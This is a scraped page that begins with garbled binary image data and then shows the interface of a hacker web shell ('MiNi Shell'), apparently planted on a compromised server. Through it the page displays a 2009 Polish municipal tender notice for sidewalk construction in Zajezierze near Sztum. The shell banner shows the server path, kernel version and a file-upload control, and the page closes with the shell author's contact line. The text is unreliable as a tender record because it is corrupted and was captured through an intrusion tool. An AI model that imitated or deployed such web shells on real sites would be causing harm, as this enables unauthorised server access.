JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090521/159978-N-2009.html

<p class="kh_header"><b>Sztum: Budowa chodnika w Zajezierzu</b><br>
<b>Numer ogłoszenia: 159978 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Sztum , ul. Mickiewicza 39, 82-400 Sztum, woj. pomorskie, tel. 055 6406303, faks 055 6406300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sztum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa chodnika w Zajezierzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa chodnika w miejscowości Zajezierze, przy drodze gminnej ( działka nr 118) długości 610 mb , na terenie części działek nr  123/40, 125/1, 124/1, 123/35, 122/1, 121/1, 119/5, 119/3 w ob. geodezyjnym Zajezierze i części dz. nr 50 w ob.4 m.Sztum

Przedmiotowy chodnik jest przedłużeniem chodnika przy ulicy Polnej w Sztumie i kończy się przy cmentarzu. Długość chodnika to 610 m. chodnik zlokalizowany jest na przeważającej długości poza rowem drogi, tylko na wysokości cmentarza przylega do nawierzchni drogi i na tym odcinku opiera się o krawężnik betonowy 15X30X100 cm. Na pozostałej długości obramowany jest obrzeżem betonowym 30 x 8 cm. Konstrukcja chodnika polega na wykonaniu ław betonowych w ilości 4,08 m 3 pod krawężnik i ustawieniu krawężnika na długości 68 m, obrzeży betonowych na długości 1073m, warstwy odsączającej gr. 10 cm z piasku na powierzchni 890 m2 i chodnika z kostki betonowej gr. 6 cm na podsypce piaskowej gr. 5 cm również na powierzchni 890 m2. 
Zakres robót obejmuje również: 
- humusowanie i obcinanie skarp 
- oznakowanie poziome skrzyżowania, przejść dla pieszych,
- ustawienie słupków z rur stalowych i przymocowanie znaków w oznakowaniu pionowym,
- wykonanie warstwy odsączającej z piasku, podbudowy z kruszywa łamanego oraz nawierzchni z kostki betonowej gr. 8 cm na zjazdach,
- wykonanie przepustów O 40 pod zjazdami,
- darniowanie skarp.
Roboty budowlane należy wykonać wg dokumentacji projektowej - budowlanej i wykonawczej stanowiącej zał. do siwz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków udziału w postępowaniu, tj. :

1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, tj.:
     zakres działalności Wykonawcy  obejmuje wykonywanie robót budowlanych w zakresie 
     m.in. budowy dróg.
         2. Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym    
             i osobami zdolnymi do wykonania zamówienia, tj.: 
  2.1)Wykonawca musi wykazać, że w ciągu ostatnich 5 lat przed dniem wszczęcia niniejszego 
       postępowania wykonał roboty budowlane polegające na budowie lub przebudowie dróg i 
       chodników,
  2.2)Wykonawca musi dysponować lub przedstawi pisemne zobowiązanie innego podmiotu o 
       udostępnieniu wykonawcy sprawnych maszyn i urządzeń niezbędnych dla wykonania 
       zamówienia, 
  2.3)Wykonawca musi mieć do dyspozycji przy wykonaniu niniejszego zamówienia, osoby    
      posiadające doświadczenie oraz kwalifikacje odpowiednie dla wykonania zamówienia, 
      lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia takich osób, w 
      tym obowiązkowo osobę - kandydata na stanowisko Kierownika budowy  ( wymagane: 
      wykształcenie wyższe techniczne lub studia wyższe zagraniczne uznane w Polsce za 
      równoważne. Minimum 5 lat doświadczenia w kierowaniu robotami budowlanymi w 
      zakresie robót drogowych.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunki  określone w pkt.2 , z tym że,  warunek określony w pkt. 2.1. musi być spełniony przynajmniej przez jednego wykonawcę występującego wspólnie. 
Wykonawca składając ofertę zobowiązuje się w przypadku podpisania umowy do skierowania do wykonania zamówienia osób wskazanych w ofercie. 

3. Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  Zamówienia, 
     tj. Wykonawca :
   3.1) nie zalega z opłacaniem podatków, opłat i składek na ubezpieczenie zdrowotne  i 
        społeczne, 
  3.2) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
        gospodarczej, na sumę nie mniej niż 500.000,00 zł. 

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunki określone w pkt. 3 spełniają łącznie. 

4. Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia na mocy art.24 
     ust 1 i 2 Pzp.

5. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie złożonych przez wykonawców dokumentów.

6. Zamawiający odrzuca ofertę jeżeli:

6.1 jest niezgodną z ustawą
6.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem 
      art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
6.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu 
      nieuczciwej konkurencji 
6.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
6.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie 
      zamówienia.
6.6 zawiera błędy w obliczeniu ceny 
6.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na 
      poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
6.8 jest nieważna na podstawie odrębnych przepisów, 

7. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą

8. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o 
    dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
     granicznego - spełnia - niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:

  A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
  A.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę 
  A.3)   Wzór umowy  

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej 
    działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa 
    zamówień publicznych składa następujące dokumenty:
 
 B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
         działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
         zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 
         miesięcy przed upływem terminu składania ofert.  
 B.2) Dokumenty potwierdzające posiadanie uprawnień - pełnomocnictw osób składających                                                                                                                                                                                                                                                                                                                               
        ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  

  B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego    
         oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
         Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem 
         podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, 
         że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
         płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione 
         nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
  B.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 
          Prawa zamówień publicznych.   
  B.5) Oświadczenie Wykonawcy , że nie podlega wykluczeniu z postępowania na mocy art.24 
         Prawa zamówień publicznych.
  B.6) W przypadku składania oferty wspólnej , pełnomocnictwo do reprezentowania wszystkich 
          Wykonawców wspólnie ubiegających się o  udzielenie zamówienia, ewentualnie umowę o 
          współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik 
          może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo 
          reprezentowania w postępowaniu i zawarcia umowy. 
          Pełnomocnictwo powinno być złożone w oryginale. 

C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i 
    doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do 
    wykonania zamówienia należy złożyć następujące dokumenty: 
 
  C.1) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem 
          niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
          działalności  jest krótszy - w tym okresie, z podaniem ich wartości oraz daty  i miejsca 
          wykonania. Zadania odpowiadające swoim rodzajem i wartością robotom budowlanym 
          stanowiącym przedmiot zamówienia prosimy wyraźnie zaznaczyć.
          Do wykazu należy dołączyć dokumenty potwierdzające, że wymienione w  wykazie   
          zamówienia zostały wykonane należycie. 
C.2) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub 
        będzie dysponował Wykonawca. 
C.3) Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania 
        zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 2 Wykonawca  
        wskazał narzędzia i urządzenia, którymi będzie dysponował. 
C.4) Wykaz osób, którymi dysponuje  lub będzie dysponował Wykonawca, które będą 
        uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji    
        zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a     
        także zakresu wykonywanych przez nich czynności, w tym osoby przewidzianej przez     
        Wykonawcę do pełnienia funkcji kierownika budowy.  
C.5) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
        zamówienia, jeżeli w wykazie, o którym mowa w pkt.4, Wykonawca wskazał osoby, 
        którymi będzie dysponował.  
C.6) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, 
        posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich 
        uprawnień,  przede wszystkim kopię uprawnień i kopię zaświadczenia o wpisie na 
        odpowiednią listę zawodową osoby - osób przewidzianych przez Wykonawcę do pełnienia 
        funkcji kierownika budowy .

D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji 
    ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące 
    dokumenty: 
  D.1) Dokumenty o których mowa w pkt. B.3 i B.4
  D.3) Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest 
          ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

  E.1) Zamiast dokumentów, o których mowa w pkt. B.1), B.3) składa dokument lub dokumenty, 
          wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające 
          odpowiednio, że:
        a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6     
            miesięcy przed upływem terminu składania ofert.
        b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i     
            zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
            na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
            organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania 
            ofert.
        c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie 
            wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   


F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

F.1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla 
      ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do 
      reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia 
      umowy
F.2) Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B , D , E  dla każdego 
        partnera z osobna, dokumenty, o których mowa w pkt. C mogą być złożone wspólnie.   

G. Postanowienia dotyczące składanych dokumentów

G.1) Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii 
       potwierdzonych za zgodność przez Wykonawcę lub osobę  - osoby uprawnione do 
       podpisania oferty z dopiskiem: za zgodność z oryginałem.

G.2) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język 
        polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sztum.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta i Gminy w Sztumie ul. Mickiewicza 39 , 82-400 Sztum.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 12:00, miejsce: Oferty należy składać w siedzibie zamawiającego lub przesłać na adres Zamawiającego :	
Urząd Miasta i Gminy w Sztumie
ul. Mickiewicza 39
82-400 Sztum
Pokój : Informacja Urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com